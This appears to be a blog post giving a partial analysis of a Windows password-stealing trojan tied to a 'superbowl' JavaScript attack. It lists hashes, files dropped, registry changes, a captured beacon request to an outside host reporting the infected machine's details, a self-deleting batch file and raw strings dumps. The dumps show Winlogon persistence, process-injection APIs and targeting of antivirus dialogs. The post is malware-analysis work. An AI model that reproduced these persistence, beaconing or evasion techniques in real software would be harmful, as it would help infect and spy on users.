Skip navigation.
Home

SuperBowl Attack

This is a partial analysis of the file invovled in the malicious "superbowl" javascript. Ill be adding more to this soon. Sorry its a little late.

V.

I highly recommend you read this:http://www.websense.com/securitylabs/blog/blog.php?BlogID=108 and http://www.websense.com/securitylabs/alerts/alert.php?AlertID=733 for more information.
==========================================
OC DATA
==========================================

MD5
ad3da9674080a9edbf9e084c10e80516 SHA-1
7f1f29fca5022f466bc466caf808f3620ad5b4a7
SHA-256
f4368a714cf16b011c577802d374e1b96a837aee00df0b4d3e0a22f278630341
Filetype: PE executable for MS Windows (GUI) Intel 80386 32-bit
Packer: No packer detected
Kapersky:
ClamAV:
Antivir:
F-Prot:
Bit Defender: Trojan.PWS.WOW.CN

Original file name = w1c.exe

==========================================
FILES CREATED
==========================================

w1c.exe:1720 CREATE C:\DOCUME~1\macdaddy\LOCALS~1\Temp\~DF587E.tmp
3.exe:1504 CREATE C:\DOCUME~1\macdaddy\LOCALS~1\Temp\~DF5D1D.tmp
1.exe:1612 CREATE C:\DOCUME~1\macdaddy\LOCALS~1\Temp\~DF5E89.tmp
1.exe:1612 CREATE C:\WINDOWS\System32\msmsgs.exe
msmsgs.exe:1904 CREATE C:\DOCUME~1\macdaddy\LOCALS~1\Temp\~DF6011.tmp
ADupdate.exe:472 CREATE C:\DOCUME~1\macdaddy\LOCALS~1\Temp\~DF63B1.tmp
ADupdate.exe:472 CREATE C:\Documents and Settings\macdaddy\Desktop\a.bat
w1c.exe:1720 CREATE C:\DOCUME~1\macdaddy\Desktop\c.bat
3.exe:1504 CREATE C:\DOCUME~1\macdaddy\Desktop\bxe3.bat
1.exe:1612 CREATE C:\DOCUME~1\macdaddy\Desktop\bxe.bat

==========================================
REGISTRY VALUES SET
==========================================

1.exe:1612 SetValue HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit SUCCESS "C:\WINDOWS\System32\userinit.exe,msmsgs.exe"
ADupdate.exe:472 SetValue HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Personal SUCCESS "C:\Documents and Settings\macdaddy\My Documents"
ADupdate.exe:472 SetValue HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{e2fa2820-3cac-11da-84a5-806d6172696f}\BaseClass SUCCESS "Drive"
ADupdate.exe:472 SetValue HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c9e3a8c3-3cad-11da-8f2a-806d6172696f}\BaseClass SUCCESS "Drive"
ADupdate.exe:472 SetValue HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c9e3a8c2-3cad-11da-8f2a-806d6172696f}\BaseClass SUCCESS "Drive"
ADupdate.exe:472 SetValue HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Common Documents SUCCESS "C:\Documents and Settings\All Users\Documents"
ADupdate.exe:472 SetValue HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Desktop SUCCESS "C:\Documents and Settings\macdaddy\Desktop"
ADupdate.exe:472 SetValue HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass SUCCESS 0x1
ADupdate.exe:472 SetValue HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName SUCCESS 0x1
ADupdate.exe:472 SetValue HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet SUCCESS 0x1
ADupdate.exe:472 SetValue HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Cache SUCCESS "C:\Documents and Settings\macdaddy\Local Settings\Temporary Internet Files"
ADupdate.exe:472 SetValue HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Cookies SUCCESS "C:\Documents and Settings\macdaddy\Cookies"

==========================================
REGISTRY KEYS CREATED
==========================================
ADupdate.exe:472 CreateKey HKLM\SOFTWARE\Microsoft\Cryptography\RNG SUCCESS Access: 0x2
ADupdate.exe:472 CreateKey HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders SUCCESS Access: 0x2000000
ADupdate.exe:472 CreateKey HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders SUCCESS Access: 0x2000000
ADupdate.exe:472 CreateKey HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{e2fa2820-3cac-11da-84a5-806d6172696f}\
ADupdate.exe:472 CreateKey HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c9e3a8c3-3cad-11da-8f2a-806d6172696f}\
ADupdate.exe:472 CreateKey HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c9e3a8c2-3cad-11da-8f2a-806d6172696f}\
ADupdate.exe:472 CreateKey HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders SUCCESS Access: 0x2000000
ADupdate.exe:472 CreateKey HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders SUCCESS Access: 0x2000000
ADupdate.exe:472 CreateKey HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders SUCCESS Access: 0x2000000
ADupdate.exe:472 CreateKey HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders SUCCESS Access: 0x2000000
ADupdate.exe:472 QueryValue HKLM\SOFTWARE\Microsoft\OLE\MinimumFreeMemPercentageToCreateProcess NOT FOUND
ADupdate.exe:472 QueryValue HKLM\SOFTWARE\Microsoft\OLE\MinimumFreeMemPercentageToCreateObject NOT FOUND
ADupdate.exe:472 CreateKey HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders SUCCESS Access: 0x2000
ADupdate.exe:472 CreateKey HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders SUCCESS Access: 0x2000000
ADupdate.exe:472 CreateKey HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders SUCCESS Access: 0x2000
ADupdate.exe:472 CreateKey HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders SUCCESS Access: 0x2000000
ADupdate.exe:472 CreateKey HKCU\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing SUCCES

==========================================
A PACKET I THINK IS RELATED
==========================================

GET /tj/mail.asp?mac=-118767649&ver=0001&st=Windows%20XP HTTP/1.1
Accept: */*
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon; .NET CLR 1.1.4322)
Host: www.dv521.com
Connection: Close
HTTP/1.1 302 Found

==========================================
SOME PE FILE INFO
==========================================

IMPORTS: KERNEL32.DLL
MSVBVM60.DLL

Imports:

[KERNEL32.DLL]
0x0 LoadLibraryA
0x0 GetProcAddress
0x0 VirtualProtect
0x0 VirtualAlloc
0x0 VirtualFree
0x0 ExitProcess
[MSVBVM60.DLL]
0x0 MethCallEngine

DEPENDS: KERNEL32.DLL
MSVBVM60.DLL

Dependencies:

KERNEL32.DLL
MSVBVM60.DLL

SECTIONS: KERNEL32.DLL
MSVBVM60.DLL

Sections:

.jcoz0

==========================================
SOURCE OF ONE OF THE BATCH FILES
==========================================
c.bat

@echo off
: selfkill
attrib -a -r -s -h C:\DOCUME~1\macdaddy\Desktop\w1c.exe
del C:\DOCUME~1\macdaddy\Desktop\w1c.exe
if exist C:\DOCUME~1\macdaddy\Desktop\w1c.exe goto selfkill
del C:\DOCUME~1\macdaddy\Desktop\c.bat
exit

==========================================
STRINGS FROM c:\windows\system32\msmsgs.exe
==========================================

SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
This program cannot be run in DOS mode.
_aspersky AntiVirus
am Fis\Micsoft Vu
al Studio\T986.OLBd
isual Studio\VB98\C2
Kaspersky AntiVirus
3qC\Program Files\Microsoft Visual Studio\VB98\VB6.OLB
Windows Messenger
pply to all
echo off
if exist
insert OK
update OK
Windows 2003
Windows XP
Windows Mellinnium
Windows NT 3.51
Windows NT 4.0
Windows 200
Kaspersky Lab
Kaspersky Anti
----------------
ExitProcess
VirtualFree
VirtualAlloc
VirtualProtect
GetProcAddress
LoadLibraryA
advapi32.dll
OriginalFilename
InternalName
ProductVersion
FileVersion
Virus
ProductName
is registered trademark of Kaspersky Lab.
Virus
Anti
Kaspersky
LegalTrademarks
LegalCopyright
CompanyName
StringFileInfo
Translation
VarFileInfo
pEtfac
OHpa
CarA
LoupaPI
ju7kZn
oKaFxSingllx
ohelpSnapsh
BllrcmpiAm
Devi8Io
bemy
Kpuxn
,rHHphe
Hukpsl
text
.data
.text
__vbaFreeStr
__vbaFreeObj
__vbaRecAssign
__vbaVarForNext
__vbaAryUnlock
_allmul
__vbaStrMove
_CIatan
__vbaRecDestructAnsi
__vbaVarCopy
__vbaVarDup
__vbaStrToAnsi
__vbaAryLock
__vbaVarAdd
__vbaVarCmpEq
__vbaVarTstNe
_adj_fdiv_r
_adj_fdivr_m32
__vbaDerefAry1
__vbaFreeStrList
__vbaStrCopy
_adj_fdivr_m32i
_adj_fdiv_m32i
__vbaVar2Vec
__vbaInStr
__vbaNew2
__vbaFileOpen
__vbaErrorOverflow
__vbaVarCat
__vbaStrVarVal
__vbaGetOwner3
__vbaUbound
__vbaFPException
__vbaVarCmpLe
_adj_fdivr_m64
_adj_fprem
__vbaPrintFile
__vbaStrToUnicode
__vbaExceptHandler
EVENT_SINK_QueryInterface
__vbaVarAnd
EVENT_SINK_Release
__vbaRecUniToAnsi
__vbaRedim
__vbaFixstrConstruct
_adj_fpatan
__vbaVarOr
DllFunctionCall
__vbaVarTstEq
__vbaStrCmp
EVENT_SINK_AddRef
__vbaFileClose
__vbaChkstk
__vbaVarTstLt
__vbaBoolVarNull
_adj_fdivr_m16i
__vbaObjSetAddref
_adj_fdiv_m16i
__vbaObjSet
__vbaOnError
__vbaVarForInit
__vbaExitProc
__vbaAryDestruct
__vbaVarCmpGe
_adj_fdiv_m32
__vbaLenVar
__vbaLenBstrB
__vbaHresultCheckObj
__vbaSetSystemError
__vbaRecDestruct
__vbaLsetFixstr
__vbaStrCat
__vbaVarCmpNe
__vbaRecAnsiToUni
_adj_fprem1
__vbaFreeObjList
_adj_fdiv_m64
__vbaEnd
__vbaFreeVarList
__vbaStrVarMove
__vbaLenBstr
__vbaAryMove
__vbaFreeVar
__vbaVarVargNofree
__vbaVarMove
_adj_fptan
__vbaVarSub
OpenProcessToken
LookupPrivilegeValueA
AdjustTokenPrivileges
WaitForSingleObject
CreateToolhelp32Snapshot
Process32First
lstrcmpiA
DeviceIoControl
CreateFileA
GetVersionExA
VirtualFree
ReadProcessMemory
VirtualAlloc
VirtualFreeEx
GetExitCodeThread
Process32Next
CreateRemoteThread
GetProcAddress
GetModuleHandleA
WriteProcessMemory
GetLastError
VirtualAllocEx
OpenProcess
GetCurrentProcess
CloseHandle
GetProcAddress
LoadLibraryA
t4HtHuk
EPii
Puh/
Puh/
Puh/
Puh/
Puh/
Puh/
Puh/
Puh/
Puh/
Puh/
Puh/
Puh/
\\.\PhysicalDrive0
ujjh
ContentLength
WSACleanup
closesocket
recv
send
connect
socket
htons
WSAGetLastError
gethostbyname
gethostbyaddr
inet_addr
WSAStartup
GetLastError
CloseHandle
WriteFile
CreateFileA
FreeLibrary
GjjWu
SeDebugPrivilege
p_Message
strFileName
Timer1
Timer2
Timer3
Timer4
__vbaExitProc
__vbaRecUniToAnsi
__vbaRecAnsiToUni
__vbaRecDestructAnsi
Failed
__vbaUbound
Close
Connection
Host
Maxthon
Windows NT 5.1
compatible
Mozilla/4.0
Agent
User
Language
Accept
Accept
\url.tmp
__vbaOnError
__vbaVarMove
__vbaRecDestruct
__vbaHresultCheckObj
__vbaFreeVar
__vbaStrToAnsi
__vbaGetOwner3
__vbaStrVarVal
__vbaSetSystemError
__vbaVarCopy
__vbaFreeStrList
__vbaStrCopy
__vbaRecAssign
__vbaVarAnd
__vbaVarCmpEq
__vbaNew2
__vbaFreeObjList
__vbaFreeVarList
__vbaObjSet
__vbaVarTstEq
__vbaVarOr
__vbaVarCmpNe
__vbaStrCmp
__vbaStrMove
__vbaBoolVarNull
__vbaFreeObj
__vbaStrCat
__vbaFreeStr
__vbaObjSetAddref
__vbaVarTstNe
__vbaErrorOverflow
__vbaFixstrConstruct
__vbaLsetFixstr
__vbaStrToUnicode
__vbaEnd
__vbaInStr
__vbaVarForInit
__vbaLenBstr
__vbaStrVarMove
__vbaVarForNext
__vbaFileOpen
__vbaPrintFile
__vbaFileClose
__vbaRedim
__vbaLenVar
__vbaVarVargNofree
__vbaVarSub
__vbaVarAdd
__vbaVarTstLt
__vbaVarCmpGe
__vbaVarCmpLe
__vbaDerefAry1
__vbaVarCat
__vbaVarDup
__vbaAryMove
__vbaVar2Vec
__vbaAryLock
__vbaAryUnlock
__vbaLenBstrB
__vbaAryDestruct
\tmpad.log
Explorer.exe
iexplore.exe
bxe3.bat
\bxe3.bat
bxe.bat
exit
goto selfkill
attrib
selfkill
\bxe.bat
Skip
lete
Disinfect
AVP.ExclusionEdit
uvTvYte_
AVP.ADetectionDialog
AVP.Product_Notification
AVP.AlertDialog
\userinit.exe,msmsgs.exe
Userinit
RegDeleteValueA
RegDeleteKeyA
RegCreateKeyA
RegCloseKey
RegQueryValueExA
RegQueryValueA
RegSetValueExA
RegSetValueA
RegOpenKeyExA
RegOpenKeyA
advapi32.dll
ADupdate
\msmsgs.exe
msmsgs.exe
.exe
//ww.dv521.com/tj/mail.asp
DeleteFileAD
CloseHandleD
GetSystemDirectoryAD
GetVolumeInformationA
GetVersionExA
SystemDirectory
EscapeCode
SelfDel
GetShortPath
fDelInvaildChr
autoRun
whereAmI
GetShortPathNameA
mouse_event
GetWindowRect
SetCursorPos
Sleep
SendMessageA
FindWindowExA
FindWindowA
GetWindow
GetClassNameA
GetWindowTextA
Timer3
Form
Timer4
Timer2
Timer1
kisv
Module3
Module2
Module1
wwUwa_w\w.w
RsEDs5PsFDsFQsDDsiPs
PsTQs.RsoPskcDs
RsPDs.PshPseOsHDs
mo_ev
ukli9P
oSendMeagG
tWindowTextA
3qC\Progr

==========================================
STRINGS FROM w1c.exe
==========================================

This program cannot be run in DOS mode.
3qC\Program Files\Microsoft Visual Studio\VB98\VB6.OLB
echo off
if exist
This program cannot be run in DOS mode.
_aspersky AntiVirus
am Fis\Micsoft Vu
al Studio\T986.OLBd
Kaspersky Lab
Kaspersky Anti
This program cannot be run in DOS mode.
Microsoft Corporation
qw vUo
XKmKE e3Q4o
----------------
.bpu
ub1skI
l_ConNym
Hfwe
_utq
EZits
QnTij g
zyobf
BSio
aEemUyhF
Web/
ncec
heervy
\aIs
gq61KKCIuD1m5e
grjjexV2
Lwuq
UoNf
Spkuj
PeCv
bru5pC
qPquqg
JCgo
/zli
jccwu
QaYwr
IiiI
EeCh
lnP8paa
MuenH
yqid
YeBqp
xdoAvH\
av7eRv
UOor
zwsu
Naffr
Suds
ZAun
Squcv
o,dpa7_
aZdyAx
Xgun
Faupoe
Posf
huxkc
HyOne
WueK
eVx
MethCallEngine
ExitProcess
VirtualFree
VirtualAlloc
VirtualProtect
GetProcAddress
LoadLibraryA
install.exe
OriginalFilename
install
InternalName
ProductVersion
FileVersion
ProductName
woow
CompanyName
StringFileInfo
Translation
VarFileInfo
slgo
ZukYkm
ALou
gqabEi
Ztci
rriiDfp
XeeZ
_Yrzi
R,vevAx
FDir
TCvo
dw.paD
n5Tnke
UaDb
osvl
/rocb
njLraI8
_efCfd
VHeu
5_dcne
Nroh
HuQrn
Jpjco
LfmCo
qovryOc
WueK
eVx
AdjustTokenPrivileges
__vbaVarTstGt
ExitProcess
VirtualFree
VirtualAlloc
VirtualProtect
GetProcAddress
LoadLibraryA
WindowsUpdata.exe
OriginalFilename
WindowsUpdata
InternalName
ProductVersion
FileVersion
Operating System
Windows
Microsoft
ProductName
CompanyName
StringFileInfo
Translation
VarFileInfo
advapi32.dll
kernel32.dll
Richf
OpenProcessToken
ExitProcess
VirtualFree
VirtualAlloc
VirtualProtect
GetProcAddress
LoadLibraryA
advapi32.dll
OriginalFilename
InternalName
ProductVersion
FileVersion
Virus
ProductName
is registered trademark of Kaspersky Lab.
Virus
Anti
Kaspersky
LegalTrademarks
LegalCopyright
CompanyName
StringFileInfo
Translation
VarFileInfo
pEtfac
OHpa
CarA
LoupaPI
ju7kZn
oKaFxSingllx
ohelpSnapsh
BllrcmpiAm
Devi8Io
bemy
Kpuxn
,rHHphe
Hukpsl
,tZep7iZh
NAeq
Lqee
_\\.\4ysicalD
lpwi
P odh
Kug/y\itc
Wcin
Z8tibt_r
zqbra8
u_ceEt
swtChka
fcAssigna
LisnK
oolNu3
Print
dimj
ddSubgNofb
MoveDup
Var2Vec
A6.DLL_vbaI2Str
uvTvYte_
vccyTa
luc
adgpi
suMesng/
Winos
.Golu4f0\NQO
EscaCeyi3
fDInvadCoa
autoRun
ShtPath
mo_ev
ukli9P
oSendMeagG
tWindowTextA
3qC\Progr
Timt.
,Gby,iw
Ty3pie
Nofqe
Rich
EVENT_SINK_QueryInterface__vbaExceptHandler
EVENT_SINK_AddRefDllFunctionCallEVENT_SINK_ReleaseX
MethCallEngine
strFileNamea
exit
goto selfkill
attrib
selfkill
\c.bat
.exe
\ADupdate.exe
fDelInvaildChr
LowByte
HiByte
GetShortPath
SelfDel
GetShortPathNameA
Form
install
install.exe
OriginalFilename
install
InternalName
ProductVersion
FileVersion
ProductName
woow
CompanyName
StringFileInfo
Translation
VarFileInfo
.jcoz2
.jcoz1
.jcoz0